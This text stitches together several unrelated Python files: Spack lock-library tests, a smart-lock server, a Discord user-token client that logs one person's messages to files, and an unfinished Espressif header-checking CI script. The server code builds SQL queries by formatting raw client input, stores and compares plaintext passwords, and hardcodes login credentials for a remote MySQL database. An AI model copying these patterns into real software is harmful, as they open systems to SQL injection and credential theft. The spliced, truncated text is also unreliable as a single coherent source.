with pytest.raises(lk.CantCreateLockError):
with lk.ReadTransaction(lock):
pass
with pytest.raises(lk.CantCreateLockError):
with lk.WriteTransaction(lock):
pass
def test_upgrade_read_to_write(private_lock_path):
"""Test that a read lock can be upgraded to a write lock.
Note that to upgrade a read lock to a write lock, you have the be the
only holder of a read lock. Client code needs to coordinate that for
shared locks. For this test, we use a private lock just to test that an
upgrade is possible.
"""
# ensure lock file exists the first time, so we open it read-only
# to begin with.
touch(private_lock_path)
lock = lk.Lock(private_lock_path)
assert lock._reads == 0
assert lock._writes == 0
lock.acquire_read()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r+'
lock.acquire_write()
assert lock._reads == 1
assert lock._writes == 1
assert lock._file.mode == 'r+'
lock.release_write()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r+'
lock.release_read()
assert lock._reads == 0
assert lock._writes == 0
assert lock._file is None
@pytest.mark.skipif(
os.environ.get('SPACK_TEST_SOLVER') == 'clingo',
reason='Tests for Clingo are run in a container with root permissions'
)
def test_upgrade_read_to_write_fails_with_readonly_file(private_lock_path):
"""Test that read-only file can be read-locked but not write-locked."""
# ensure lock file exists the first time
touch(private_lock_path)
# open it read-only to begin with.
with read_only(private_lock_path):
lock = lk.Lock(private_lock_path)
assert lock._reads == 0
assert lock._writes == 0
lock.acquire_read()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r'
# upgrade to write here
with pytest.raises(lk.LockROFileError):
lock.acquire_write()
class ComplexAcquireAndRelease(object):
def __init__(self, lock_path):
self.lock_path = lock_path
def p1(self, barrier):
lock = lk.Lock(self.lock_path)
lock.acquire_write()
barrier.wait() # ---------------------------------------- 1
# others test timeout
barrier.wait() # ---------------------------------------- 2
lock.release_write() # release and others acquire read
barrier.wait() # ---------------------------------------- 3
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
lock.acquire_read()
barrier.wait() # ---------------------------------------- 4
lock.release_read()
barrier.wait() # ---------------------------------------- 5
# p2 upgrades read to write
barrier.wait() # ---------------------------------------- 6
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 7
# p2 releases write and read
barrier.wait() # ---------------------------------------- 8
# p3 acquires read
barrier.wait() # ---------------------------------------- 9
# p3 upgrades read to write
barrier.wait() # ---------------------------------------- 10
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 11
# p3 releases locks
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
def p2(self, barrier):
lock = lk.Lock(self.lock_path)
# p1 acquires write
barrier.wait() # ---------------------------------------- 1
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 2
lock.acquire_read()
barrier.wait() # ---------------------------------------- 3
# p1 tests shared read
barrier.wait() # ---------------------------------------- 4
# others release reads
barrier.wait() # ---------------------------------------- 5
lock.acquire_write() # upgrade read to write
barrier.wait() # ---------------------------------------- 6
# others test timeout
barrier.wait() # ---------------------------------------- 7
lock.release_write() # release read AND write (need both)
lock.release_read()
barrier.wait() # ---------------------------------------- 8
# p3 acquires read
barrier.wait() # ---------------------------------------- 9
# p3 upgrades read to write
barrier.wait() # ---------------------------------------- 10
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 11
# p3 releases locks
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
def p3(self, barrier):
lock = lk.Lock(self.lock_path)
# p1 acquires write
barrier.wait() # ---------------------------------------- 1
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 2
lock.acquire_read()
barrier.wait() # ---------------------------------------- 3
# p1 tests shared read
barrier.wait() # ---------------------------------------- 4
lock.release_read()
barrier.wait() # ---------------------------------------- 5
# p2 upgrades read to write
barrier.wait() # ---------------------------------------- 6
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 7
# p2 releases write & read
barrier.wait() # ---------------------------------------- 8
lock.acquire_read()
barrier.wait() # ---------------------------------------- 9
lock.acquire_write()
barrier.wait() # ---------------------------------------- 10
# others test timeout
barrier.wait() # ---------------------------------------- 11
lock.release_read() # release read AND write in opposite
lock.release_write() # order from before on p2
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
#
# Longer test case that ensures locks are reusable. Ordering is
# enforced by barriers throughout -- steps are shown with numbers.
#
def test_complex_acquire_and_release_chain(lock_path):
test_chain = ComplexAcquireAndRelease(lock_path)
multiproc_test(test_chain.p1,
test_chain.p2,
test_chain.p3)
class AssertLock(lk.Lock):
"""Test lock class that marks acquire/release events."""
def __init__(self, lock_path, vals):
super(AssertLock, self).__init__(lock_path)
self.vals = vals
# assert hooks for subclasses
assert_acquire_read = lambda self: None
assert_acquire_write = lambda self: None
assert_release_read = lambda self: None
assert_release_write = lambda self: None
def acquire_read(self, timeout=None):
self.assert_acquire_read()
result = super(AssertLock, self).acquire_read(timeout)
self.vals['acquired_read'] = True
return result
def acquire_write(self, timeout=None):
self.assert_acquire_write()
result = super(AssertLock, self).acquire_write(timeout)
self.vals['acquired_write'] = True
return result
def release_read(self, release_fn=None):
self.assert_release_read()
result = super(AssertLock, self).release_read(release_fn)
self.vals['released_read'] = True
return result
def release_write(self, release_fn=None):
self.assert_release_write()
result = super(AssertLock, self).release_write(release_fn)
self.vals['released_write'] = True
return result
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_read(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def assert_acquire_write(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_write(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def enter_fn():
# assert enter_fn is called while lock is held
assert vals['acquired_%s' % type]
vals['entered_fn'] = True
def exit_fn(t, v, tb):
# assert exit_fn is called while lock is held
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception'] = (t or v or tb)
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with transaction(lock, acquire=enter_fn, release=exit_fn):
assert vals['acquired_%s' % type]
assert not vals['released_%s' % type]
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['acquired_%s' % type]
assert vals['released_%s' % type]
assert not vals['exception']
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction_with_exception(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_read(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def assert_acquire_write(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_write(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def enter_fn():
assert vals['acquired_%s' % type]
vals['entered_fn'] = True
def exit_fn(t, v, tb):
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception'] = (t or v or tb)
return exit_result
exit_result = False
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with pytest.raises(Exception):
with transaction(lock, acquire=enter_fn, release=exit_fn):
raise Exception()
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['exception']
# test suppression of exceptions from exit_fn
exit_result = True
vals.clear()
# should not raise now.
with transaction(lock, acquire=enter_fn, release=exit_fn):
raise Exception()
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['exception']
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction_with_context_manager(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_ctx']
assert not vals['exited_ctx']
def assert_release_read(self):
assert vals['entered_ctx']
assert vals['exited_ctx']
def assert_acquire_write(self):
assert not vals['entered_ctx']
assert not vals['exited_ctx']
def assert_release_write(self):
assert vals['entered_ctx']
assert vals['exited_ctx']
class TestContextManager(object):
def __enter__(self):
vals['entered_ctx'] = True
def __exit__(self, t, v, tb):
assert not vals['released_%s' % type]
vals['exited_ctx'] = True
vals['exception_ctx'] = (t or v or tb)
return exit_ctx_result
def exit_fn(t, v, tb):
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception_fn'] = (t or v or tb)
return exit_fn_result
exit_fn_result, exit_ctx_result = False, False
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with transaction(lock, acquire=TestContextManager, release=exit_fn):
pass
assert vals['entered_ctx']
assert vals['exited_ctx']
assert vals['exited_fn']
assert not vals['exception_ctx']
assert not vals['exception_fn']
vals.clear()
with transaction(lock, acquire=TestContextManager):
pass
assert vals['entered_ctx']
assert vals['exited_ctx']
assert not vals['exited_fn']
assert not vals['exception_ctx']
assert not vals['exception_fn']
# below are tests for exceptions with and without suppression
def assert_ctx_and_fn_exception(raises=True):
vals.clear()
if raises:
with pytest.raises(Exception):
with transaction(
lock, acquire=TestContextManager, release=exit_fn):
raise Exception()
else:
with transaction(
lock, acquire=TestContextManager, release=exit_fn):
raise Exception()
assert vals['entered_ctx']
assert vals['exited_ctx']
assert vals['exited_fn']
assert vals['exception_ctx']
assert vals['exception_fn']
def assert_only_ctx_exception(raises=True):
vals.clear()
if raises:
with pytest.raises(Exception):
with transaction(lock, acquire=TestContextManager):
raise Exception()
else:
with transaction(lock, acquire=TestContextManager):
raise Exception()
assert vals['entered_ctx']
assert vals['exited_ctx']
assert not vals['exited_fn']
assert vals['exception_ctx']
assert not vals['exception_fn']
# no suppression
assert_ctx_and_fn_exception(raises=True)
assert_only_ctx_exception(raises=True)
# suppress exception only in function
exit_fn_result, exit_ctx_result = True, False
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=True)
# suppress exception only in context
exit_fn_result, exit_ctx_result = False, True
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=False)
# suppress exception in function and context
exit_fn_result, exit_ctx_result = True, True
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=False)
def test_nested_write_transaction(lock_path):
"""Ensure that the outermost write transaction writes."""
def write(t, v, tb):
vals['wrote'] = True
vals = collections.defaultdict(lambda: False)
lock = AssertLock(lock_path, vals)
# write/write
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
# read/write
vals.clear()
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert vals['wrote']
# write/read/write
vals.clear()
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
# read/write/read/write
vals.clear()
with lk.ReadTransaction(lock):
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
def test_nested_reads(lock_path):
"""Ensure that write transactions won't re-read data."""
def read():
vals['read'] += 1
vals = collections.defaultdict(lambda: 0)
lock = AssertLock(lock_path, vals)
# read/read
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
# write/write
vals.clear()
assert vals['read'] == 0
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# read/write
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# write/read/write
vals.clear()
assert vals['read'] == 0
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# read/write/read/write
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
class LockDebugOutput(object):
def __init__(self, lock_path):
self.lock_path = lock_path
self.host = socket.getfqdn()
def p1(self, barrier, q1, q2):
# exchange pids
p1_pid = os.getpid()
q1.put(p1_pid)
p2_pid = q2.get()
# set up lock
lock = lk.Lock(self.lock_path, debug=True)
with lk.WriteTransaction(lock):
# p1 takes write lock and writes pid/host to file
barrier.wait() # ------------------------------------ 1
assert lock.pid == p1_pid
assert lock.host == self.host
# wait for p2 to verify contents of file
barrier.wait() # ---------------------------------------- 2
# wait for p2 to take a write lock
barrier.wait() # ---------------------------------------- 3
# verify pid/host info again
with lk.ReadTransaction(lock):
assert lock.old_pid == p1_pid
assert lock.old_host == self.host
assert lock.pid == p2_pid
assert lock.host == self.host
barrier.wait() # ---------------------------------------- 4
def p2(self, barrier, q1, q2):
# exchange pids
p2_pid = os.getpid()
p1_pid = q1.get()
q2.put(p2_pid)
# set up lock
lock = lk.Lock(self.lock_path, debug=True)
# p1 takes write lock and writes pid/host to file
barrier.wait() # ---------------------------------------- 1
# verify that p1 wrote information to lock file
with lk.ReadTransaction(lock):
assert lock.pid == p1_pid
assert lock.host == self.host
barrier.wait() # ---------------------------------------- 2
# take a write lock on the file and verify pid/host info
with lk.WriteTransaction(lock):
assert lock.old_pid == p1_pid
assert lock.old_host == self.host
assert lock.pid == p2_pid
assert lock.host == self.host
barrier.wait() # ------------------------------------ 3
# wait for p1 to verify pid/host info
barrier.wait() # ---------------------------------------- 4
def test_lock_debug_output(lock_path):
test_debug = LockDebugOutput(lock_path)
q1, q2 = Queue(), Queue()
local_multiproc_test(test_debug.p2, test_debug.p1, extra_args=(q1, q2))
def test_lock_with_no_parent_directory(tmpdir):
"""Make sure locks work even when their parent directory does not exist."""
with tmpdir.as_cwd():
lock = lk.Lock('foo/bar/baz/lockfile')
with lk.WriteTransaction(lock):
pass
def test_lock_in_current_directory(tmpdir):
"""Make sure locks work even when their parent directory does not exist."""
with tmpdir.as_cwd():
# test we can create a lock in the current directory
lock = lk.Lock('lockfile')
for i in range(10):
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
# and that we can do the same thing after it's already there
lock = lk.Lock('lockfile')
for i in range(10):
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
def test_attempts_str():
assert lk._attempts_str(0, 0) == ''
assert lk._attempts_str(0.12, 1) == ''
assert lk._attempts_str(12.345, 2) == ' after 12.35s and 2 attempts'
def test_lock_str():
lock = lk.Lock('lockfile')
lockstr = str(lock)
assert 'lockfile[0:0]' in lockstr
assert 'timeout=None' in lockstr
assert '#reads=0, #writes=0' in lockstr
def test_downgrade_write_okay(tmpdir):
"""Test the lock write-to-read downgrade operation."""
with tmpdir.as_cwd():
lock = lk.Lock('lockfile')
lock.acquire_write()
lock.downgrade_write_to_read()
assert lock._reads == 1
assert lock._writes == 0
def test_downgrade_write_fails(tmpdir):
"""Test failing the lock write-to-read downgrade operation."""
with tmpdir.as_cwd():
lock = lk.Lock('lockfile')
lock.acquire_read()
msg = 'Cannot downgrade lock from write to read on file: lockfile'
with pytest.raises(lk.LockDowngradeError, match=msg):
lock.downgrade_write_to_read()
@pytest.mark.parametrize("err_num,err_msg",
[(errno.EACCES, "Fake EACCES error"),
(errno.EAGAIN, "Fake EAGAIN error"),
(errno.ENOENT, "Fake ENOENT error")])
def test_poll_lock_exception(tmpdir, monkeypatch, err_num, err_msg):
"""Test poll lock exception handling."""
def _lockf(fd, cmd, len, start, whence):
raise IOError(err_num, err_msg)
with tmpdir.as_cwd():
lockfile = 'lockfile'
lock = lk.Lock(lockfile)
touch(lockfile)
monkeypatch.setattr(fcntl, 'lockf', _lockf)
if err_num in [errno.EAGAIN, errno.EACCES]:
assert not lock._poll_lock(fcntl.LOCK_EX)
else:
with pytest.raises(IOError, match=err_msg):
lock._poll_lock(fcntl.LOCK_EX)
def test_upgrade_read_okay(tmpdir):
"""Test the lock read-to-write upgrade operation."""
with tmpdir.as_cwd():
lock = lk.Lock('lockfile')
lock.acquire_read()
lock.upgrade_read_to_write()
assert lock._reads == 0
assert lock._writes == 1
def test_upgrade_read_fails(tmpdir):
"""Test failing the lock read-to-write upgrade operation."""
with tmpdir.as_cwd():
lock = lk.Lock('lockfile')
lock.acquire_write()
msg = 'Cannot upgrade lock from read to write on file: lockfile'
with pytest.raises(lk.LockUpgradeError, match=msg):
lock.upgrade_read_to_write()
|
server.py
|
'''
Main script: server handling client/lock connection
Usage: set `serverip` in config.ini to this server's IP address, then launch
the lock before logging in with the client.
'''
import socket
import sys
import os
from threading import *
import mysql.connector
from configparser import ConfigParser
config = ConfigParser()
config.read('config.ini')
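# A minimal config.ini sketch this script assumes; only the [main]/serverip key is
# read below, and the address shown is a placeholder:
#
#   [main]
#   serverip = 192.168.1.10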
LOGINS = []
class Database:
"""Used to access database"""
def __init__(self, ip, username, password, database):
self.lockdb = mysql.connector.connect(
host=ip,
user=username,
passwd=password,
database=database
)
self.lockdbcursor = self.lockdb.cursor()
def is_valid_login(self, username, password):
query = "SELECT password FROM accounts WHERE username='{0}'"
self.lockdbcursor.execute(query.format(username))
lockdbresult = self.lockdbcursor.fetchall()
for x in lockdbresult:
if x[0] == password:
return True
return False
def get_lock_addresses(self, username):
lock_addresses = []
query = "SELECT interfaceip, port FROM accounts WHERE username='{0}'"
self.lockdbcursor.execute(query.format(username))
lockdbresult = self.lockdbcursor.fetchall()
for lock_address in lockdbresult:
lock_addresses.append(lock_address)
return lock_addresses
def get_lock_address_by_interface(self, interface):
query = "SELECT interfaceip, port FROM accounts WHERE interface='{0}'"
self.lockdbcursor.execute(query.format(interface))
lockdbresult = self.lockdbcursor.fetchall()
lock_address = lockdbresult[0]
return lock_address
def is_unique_name(self, username):
query = "SELECT username FROM accounts"
        self.lockdbcursor.execute(query)
lockdbresult = self.lockdbcursor.fetchall()
for x in lockdbresult:
if x[0] == username:
return False
return True
def does_lock_exist(self, interface):
query = "SELECT interface FROM accounts"
self.lockdbcursor.execute(query)
lockdbresult = self.lockdbcursor.fetchall()
for x in lockdbresult:
if x[0] == interface:
return True
return False
def insert_account(self, username, password, interface, lock_address):
query = "INSERT INTO accounts (username, password, interface, interfaceip, port) VALUES ('{0}', '{1}', '{2}', '{3}', {4});"
self.lockdbcursor.execute(query.format(username, password, interface, lock_address[0], lock_address[1]))
self.lockdb.commit()
def get_lockname(self, lock_address):
query = "SELECT lockname FROM accounts WHERE interfaceip='{0}' AND port={1};"
self.lockdbcursor.execute(query.format(lock_address[0], lock_address[1]))
lockdbresult = self.lockdbcursor.fetchall()
return lockdbresult[0][0]
def change_username(self, lockname, lock_address):
try:
query = "UPDATE accounts SET lockname='{0}' WHERE interfaceip='{1}' AND port={2};"
self.lockdbcursor.execute(query.format(lockname, lock_address[0], lock_address[1]))
self.lockdb.commit()
return "CHANGE SUCCEEDED"
except Exception as e:
print(e)
return "CHANGE FAILED"
class Client:
"""Handle a client"""
def __init__(self, client_sock, client_address, lock_addresses, username, database):
self.client_sock = client_sock
self.client_address = client_address
self.lock_addresses = lock_addresses
self.username = username
self.database = database
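    # Client wire protocol handled below, reconstructed from the commands this
    # handler parses (plain whitespace-separated text over TCP):
    #   "STATE <n>"      -> forward "#STATUS,SLOT%" to lock <n>, return its state and name
    #   "LOCK <n>"       -> forward "#SLOT,LOCK%" to lock <n>, return its reply
    #   "UNLOCK <n>"     -> forward "#SLOT,OPEN%" to lock <n>, return its reply
    #   "CHANGENAME <n>" -> next packet carries the new name for lock <n>
    #   anything else    -> close the connection and log the user out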
def client_handler(self):
global LOGINS
print("Started server handler")
try:
while True:
self.lock_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
data = self.client_sock.recv(1024)
data = data.decode().split()
print(data)
locknumber = int(data[1])
if data[0] == "STATE":
self.get_state(locknumber)
elif data[0] == "LOCK":
self.lock_sock.connect(self.lock_addresses[locknumber])
request = "#SLOT,LOCK%"
self.lock_sock.sendall(bytes(request, 'utf8'))
data = self.lock_sock.recv(1024)
self.lock_sock.close()
self.client_sock.sendall(data)
elif data[0] == "UNLOCK":
self.lock_sock.connect(self.lock_addresses[locknumber])
request = "#SLOT,OPEN%"
self.lock_sock.sendall(bytes(request, 'utf8'))
data = self.lock_sock.recv(1024)
self.lock_sock.close()
self.client_sock.sendall(data)
elif data[0] == "CHANGENAME":
lockname = self.client_sock.recv(1024).decode()
result = self.database.change_username(lockname, self.lock_addresses[locknumber])
print(lockname)
print(result)
self.client_sock.sendall(bytes(result, 'utf8'))
else:
self.client_sock.close()
LOGINS.remove(self.username)
print(self.username + " disconnected")
break
except Exception as e:
print(e)
self.client_sock.close()
LOGINS.remove(self.username)
print(self.username + " disconnected")
def get_state(self, locknumber):
self.lock_sock.connect(self.lock_addresses[locknumber])
self.lock_sock.send(bytes("#STATUS,SLOT%", 'utf8'))
state = self.lock_sock.recv(1024)
self.client_sock.sendall(state)
confirm = self.client_sock.recv(1024)
lockname = self.database.get_lockname(self.lock_addresses[locknumber])
print(lockname)
self.client_sock.sendall(bytes(lockname, 'utf8'))
def create_server(IP, SERVERPORT):
sck = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (IP, SERVERPORT)
sck.bind(server_address)
sck.listen(5)
return sck
def create_account(username, password, interface, database):
if database.is_unique_name(username):
if database.does_lock_exist(interface):
lock_address = database.get_lock_address_by_interface(interface)
database.insert_account(username, password, interface, lock_address)
return "CREATION SUCCEEDED"
else:
return "CREATION FAILED"
else:
return "CREATION FAILED"
def main():
global LOGINS
IP = config.get('main', 'serverip')
SERVERPORT = 10000
sock = create_server(IP, SERVERPORT)
database = Database('remotemysql.com', 'SpHsyQhe9K', 'fYrMfTbqN2', 'SpHsyQhe9K')
while True:
client_sock, client_address = sock.accept()
print("Connection created ")
print(client_address[0])
print(client_address[1])
identifier = client_sock.recv(1024)
print("packet received: identifier")
identifier = identifier.decode().split()
if identifier[0] == "LOGIN":
username = identifier[1]
password = identifier[2]
print(username + " connected")
if database.is_valid_login(username, password):
if username not in LOGINS:
lock_addresses = database.get_lock_addresses(username)
locks = str(len(lock_addresses))
client_sock.sendall(bytes("LOGINSUCCEEDED " + locks, 'utf8'))
client = Client(client_sock, client_address, lock_addresses, username, database)
LOGINS.append(username)
t = Thread(target=client.client_handler, args=())
t.start()
else:
print(username + " already logged in")
client_sock.sendall(bytes("LOGINFAILED", 'utf8'))
client_sock.close()
else:
client_sock.sendall(bytes("LOGINFAILED", 'utf8'))
client_sock.close()
if identifier[0] == "REGISTER":
creation_result = create_account(identifier[1], identifier[2], identifier[3], database)
client_sock.sendall(bytes(creation_result, 'utf8'))
if __name__ == '__main__':
main()
|
main.py
|
from concurrent.futures import thread
import json
import os
import sys
import threading
import time
import webbrowser
import webview
import client
import dotenv
import flask
from flask_socketio import SocketIO, emit, join_room, leave_room, \
close_room, rooms, disconnect
env = dotenv.load_dotenv() #load env
token = os.environ.get("DISCORD_TOKEN")
app = flask.Flask(__name__)
socketio = SocketIO(app)
gateway = client.Gateway() #init discord gateway
user = client.User() #init discord http api
gateway.connect() #connect to ws://gateway.discord.gg
gateway.identify(token) #identify token
gateway.heartbeat(gateway.heartbeat_interval) #start heartbeat loop
_ready = False #gateway ready status
user.identify(token) #identify user token
dms = []
#listen events from websocket
index = [0]
@gateway.listener("MESSAGE_CREATE")
def new_message(event):
name = event["d"]["author"]["username"] + "#" + event["d"]["author"]["discriminator"]
message = event["d"]["content"]
if name == "yki#8153":
json.dump(event, open(f"{index[0]}.json", "w"))
index[0] += 1
@gateway.listener("READY")
def ready(event):
global _ready
dms = user.fetch_dms(event)
socketio.emit("ready", dms, broadcast=True)
json.dump(event, open("ready.json", "w"))
_ready = True
gateway.listen() #start event listen loop
@app.route("/")
def index_page():  # renamed so it does not shadow the message-counter list `index` above
return flask.render_template("app.html")
if __name__ == "__main__":
webview.create_window('YiCord', 'http://127.0.0.1:5544', width=1000, height=600, text_select=True)
threading.Thread(target=socketio.run, args=(app, "127.0.0.1", 5544), daemon=True).start()
webview.start()
|
check_public_headers.py
|
#!/usr/bin/env python
#
# Checks all public headers in IDF in the ci
#
# Copyright 2020 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from __future__ import unicode_literals
import re
import os
import subprocess
import json
import fnmatch
import argparse
import queue
from threading import Thread, Event
import tempfile
class HeaderFailed(Exception):
"""Base header failure exeption"""
pass
class HeaderFailedSdkconfig(HeaderFailed):
def __str__(self):
return "Sdkconfig Error"
class HeaderFailedBuildError(HeaderFailed):
def __str__(self):
return "Header Build Error"
class HeaderFailedCppGuardMissing(HeaderFailed):
def __str__(self):
return "Header Missing C++ Guard"
class HeaderFailedContainsCode(HeaderFailed):
def __str__(self):
return "Header Produced non-zero object"
# Creates a temp file and returns both output as a string and a file name
#
def exec_cmd_to_temp_file(what, suffix=""):
out_file = tempfile.NamedTemporaryFile(suffix=suffix, delete=False)
rc, out, err = exec_cmd(what, out_file)
with open(out_file.name, "r") as f:
out = f.read()
return rc, out, err, out_file.name
def exec_cmd(what, out_file=subprocess.PIPE):
p = subprocess.Popen(what, stdin=subprocess.PIPE, stdout=out_file, stderr=subprocess.PIPE)
output, err = p.communicate()
rc = p.returncode
output = output.decode('utf-8') if output is not None else None
err = err.decode('utf-8') if err is not None else None
return rc, output, err
class PublicHeaderChecker:
# Intermediate results
COMPILE_ERR_REF_CONFIG_HDR_FAILED = 1 # -> Cannot compile and failed with injected SDKCONFIG #error (header FAILs)
COMPILE_ERR_ERROR_MACRO_HDR_OK = 2 # -> Cannot compile, but failed with "#error" directive (header seems OK)
COMPILE_ERR_HDR_FAILED = 3 # -> Cannot compile with another issue, logged if verbose (header FAILs)
PREPROC_OUT_ZERO_HDR_OK = 4 # -> Both preprocessors produce zero out (header file is OK)
PREPROC_OUT_SAME_HRD_FAILED = 5 # -> Both preprocessors produce the same, non-zero output (header file FAILs)
PREPROC_OUT_DIFFERENT_WITH_EXT_C_HDR_OK = 6 # -> Both preprocessors produce different, non-zero output with extern "C" (header seems OK)
PREPROC_OUT_DIFFERENT_NO_EXT_C_HDR_FAILED = 7 # -> Both preprocessors produce different, non-zero output without extern "C" (header fails)
def log(self, message, debug=False):
if self.verbose or debug:
print(message)
def __init__(self, verbose=False, jobs=1, prefix=None):
self.gcc = "{}gcc".format(prefix)
self.gpp = "{}g++".format(prefix)
self.verbose = verbose
self.jobs = jobs
self.prefix = prefix
self.extern_c = re.compile(r'extern "C"')
self.error_macro = re.compile(r'#error')
self.error_orphan_kconfig = re.compile(r"#error CONFIG_VARS_USED_WHILE_SDKCONFIG_NOT_INCLUDED")
self.kconfig_macro = re.compile(r'\bCONFIG_[A-Z0-9_]+')
self.assembly_nocode = r'^\s*(\.file|\.text|\.ident).*$'
self.check_threads = []
self.job_queue = queue.Queue()
self.failed_queue = queue.Queue()
self.terminate = Event()
def __enter__(self):
for i in range(self.jobs):
t = Thread(target=self.check_headers, args=(i, ))
self.check_threads.append(t)
t.start()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.terminate.set()
for t in self.check_threads:
t.join()
    # thread function: processes incoming header files from a queue
def check_headers(self, num):
while not self.terminate.is_set():
if not self.job_queue.empty():
task = self.job_queue.get()
if task is None:
self.terminate.set()
else:
try:
self.check_one_header(task, num)
except HeaderFailed as e:
self.failed_queue.put("{}: Failed! {}".format(task, e))
def get_failed(self):
return list(self.failed_queue.queue)
def join(self):
for t in self.check_threads:
            while t.is_alive() and not self.terminate.is_set():
t.join(1) # joins with timeout to respond to keyboard interrupt
# Checks one header calling:
# - preprocess_one_header() to test and compare preprocessor outputs
# - check_no_code() to test if header contains some executable code
# Procedure
# 1) Preprocess the include file with C preprocessor and with CPP preprocessor
# - Pass the test if the preprocessor outputs are the same and whitespaces only (#define only header)
# - Fail the test if the preprocessor outputs are the same (but with some code)
# - If outputs different, continue with 2)
# 2) Strip out all include directives to generate "temp.h"
